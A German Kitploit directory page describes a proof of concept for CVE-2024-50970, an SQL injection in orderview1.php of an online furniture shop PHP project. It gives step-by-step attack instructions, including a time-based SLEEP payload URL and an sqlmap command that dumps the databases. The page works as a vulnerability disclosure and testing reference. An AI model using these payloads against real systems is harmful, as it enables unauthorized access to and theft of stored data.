Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/akhlak2511/cve-2024-50970
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungDatenbanksicherheit
GitHubakhlak2511/cve-2024-50970

CVE-2024-50970

Proof-of-concept für CVE-2024-50970: SQL-Injection im Itsourcecode Online Furniture Shopping Project 1.0. Demonstriert die Ausnutzung über den id-Parameter in orderview1.php mit zeitbasierten Payloads und SQLMap-Integration.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-50970

Beschreibung

Eine SQL-Injection-Schwachstelle in der Datei orderview1.php des Itsourcecode Online Furniture Shopping Project 1.0 ermöglicht es entfernten Angreifern, beliebige SQL-Befehle über den Parameter id auszuführen.

Schwachstellentyp

SQL-Injection

Anbieter des Produkts

Itsourcecode

Betroffene Produktcodebasis:

https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0

Betroffene Komponente:

Das Itsourcecode Online Furniture Shopping v1.0 ist anfällig für SQL-Injection über den Parameter id in der Seite orderview1.php

Angriffsvektoren:

  1. Richten Sie die Anwendung lokal ein, registrieren Sie ein Konto und melden Sie sich mit dem neu registrierten Konto an.
  2. Navigieren Sie in Ihrem Browser zu folgender URL: http://localhost/nikos/orderview1.php?action=edit&id=1728835149
  3. SQL-Payload injizieren: Ändern Sie den Parameter id in der URL, um eine zeitbasierte SQL-Injection-Payload einzufügen. http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
  4. Beobachten Sie die Antwort der Anwendung: Die Seite sollte merklich länger (10 Sekunden) zum Laden benötigen, wenn die Injection erfolgreich ist, was bestätigt, dass der Parameter id anfällig für SQL-Injection ist.
  5. Verwenden Sie nun das SQLMap-Tool zur weiteren Ausnutzung und zum Auslesen der Datenbanken mit dem folgenden Befehl: python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast

Referenzen:

  1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
  2. https://owasp.org/www-community/attacks/SQL_Injection
Tool herunterladen